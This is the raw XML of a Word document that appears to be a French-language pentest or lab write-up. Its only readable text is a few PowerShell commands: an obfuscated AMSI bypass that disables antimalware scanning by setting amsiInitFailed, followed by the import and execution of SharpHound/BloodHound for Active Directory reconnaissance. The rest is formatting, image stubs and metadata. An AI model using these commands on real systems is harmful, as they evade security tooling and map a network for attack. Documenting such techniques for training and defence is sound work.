    <w:p w14:paraId="3ED3C41F" w14:textId="77777777" w:rsidR="000601C0" w:rsidRPr="000601C0" w:rsidRDefault="000601C0" w:rsidP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color w:val="444444"/>
        </w:rPr>
        <w:t>PS &gt; sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D17AB28" w14:textId="77777777" w:rsidR="000601C0" w:rsidRPr="000601C0" w:rsidRDefault="000601C0" w:rsidP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color w:val="444444"/>
        </w:rPr>
        <w:t>PS &gt; Import-Module C:\Windows\Temp\SharpHound.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41930DC1" w14:textId="41837703" w:rsidR="000601C0" w:rsidRDefault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color w:val="444444"/>
        </w:rPr>
        <w:t>PS &gt; Invoke-BloodHound -CollectionMethod Default -OutputDirectory C:\Windows\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D72CE3" w14:textId="7E3E92CF" w:rsidR="00ED1279" w:rsidRDefault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noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B89739" wp14:editId="2038B0DC">
            <wp:extent cx="5895833" cy="1255395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="9202294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94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7061" cy="1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5B1" w14:textId="77777777" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EACD2A8" w14:textId="69C8198D" w:rsidR="000601C0" w:rsidRDefault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noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C891861" wp14:editId="6F42966E">
            <wp:extent cx="5760720" cy="2564130"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="141283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31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92F" w14:textId="1840E7D8" w:rsidR="000601C0" w:rsidRDefault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noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C043E04" wp14:editId="449B6365">
            <wp:extent cx="5760720" cy="2144395"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="12289013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1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DA0" w14:textId="77777777" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6BD966" w14:textId="77777777" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EE8E08" w14:textId="77777777" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74748481" w14:textId="2A7FEE88" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000601C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C09763" wp14:editId="722B5641">
            <wp:extent cx="5760720" cy="989330"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="6368996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9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D1BB" w14:textId="77777777" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7897F4B3" w14:textId="77777777" w:rsidR="000601C0" w:rsidRDefault="000601C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="444444"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000601C0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roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="inherit">
    <w:altName w:val="Cambria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274"/>
    <w:rsid w:val="000270A4"/>
    <w:rsid w:val="000601C0"/>
    <w:rsid w:val="00136279"/>
    <w:rsid w:val="001B21C6"/>
    <w:rsid w:val="001C6CAA"/>
    <w:rsid w:val="002D539F"/>
    <w:rsid w:val="00373DAB"/>
    <w:rsid w:val="004A6B40"/>
    <w:rsid w:val="00705E7D"/>
    <w:rsid w:val="00767ADA"/>
    <w:rsid w:val="007A3420"/>
    <w:rsid w:val="00860C5E"/>
    <w:rsid w:val="0098161A"/>
    <w:rsid w:val="009C324D"/>
    <w:rsid w:val="00A176D0"/>
    <w:rsid w:val="00A64274"/>
    <w:rsid w:val="00C87B3A"/>
    <w:rsid w:val="00CC4A02"/>
    <w:rsid w:val="00CC70E4"/>
    <w:rsid w:val="00ED1279"/>
    <w:rsid w:val="00F3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EB8DE"/>
  <w15:docId w15:val="{F608C8F0-3EFF-448D-92D3-97AC9F556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093F17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qFormat/>
    <w:rsid w:val="00093F17"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Corpsdetexte"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="5B9BD5"/>
      </w:pBdr>
      <w:spacing w:after="300"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri" w:hAnsi="Calibri Light" w:cs="Tahoma"/>
      <w:color w:val="323E4F"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52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093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exteprformat">
    <w:name w:val="Texte préformaté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eb7fb9e-85b3-4675-9451-acbf8cd5486d" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="fef845bd-a8a3-41e9-b3ce-37b57a11ee2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17B5E8995C354ABF96D0E0028C6D6E" ma:contentTypeVersion="11" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="331d570c2d784514a9cefa9e513c74b9">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="fef845bd-a8a3-41e9-b3ce-37b57a11ee2c" xmlns:ns3="beb7fb9e-85b3-4675-9451-acbf8cd5486d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="0570dfc56b57ea39098a14b0de982c67" ns2:_="" ns3:_="">
    <xsd:import namespace="fef845bd-a8a3-41e9-b3ce-37b57a11ee2c"/>
    <xsd:import namespace="beb7fb9e-85b3-4675-9451-acbf8cd548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f845bd-a8a3-41e9-b3ce-37b57a11ee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d4b6e4fd-4af2-4f07-b7d1-18266e5856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b7fb9e-85b3-4675-9451-acbf8cd5486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52c0c18-c44c-4fe0-85fb-d71fce5a2768}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="beb7fb9e-85b3-4675-9451-acbf8cd548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A676A4-E649-4CB2-B77A-28FF5DD9DF06}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="8d2c9915-5c45-4ad6-a671-8c5c261169ac"/>
    <ds:schemaRef ds:uri="63ac23e6-3950-46bd-bab9-3b1bbcb45287"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C3B34C31-4538-46E5-B334-68DFA79E58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2475FD-D8BC-4D53-85B7-1D47C810BA4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316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AUCAUCOU</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Mustapha MHIDI</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-23T15:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-03T09:30:00Z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0x010100E117B5E8995C354ABF96D0E0028C6D6E</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>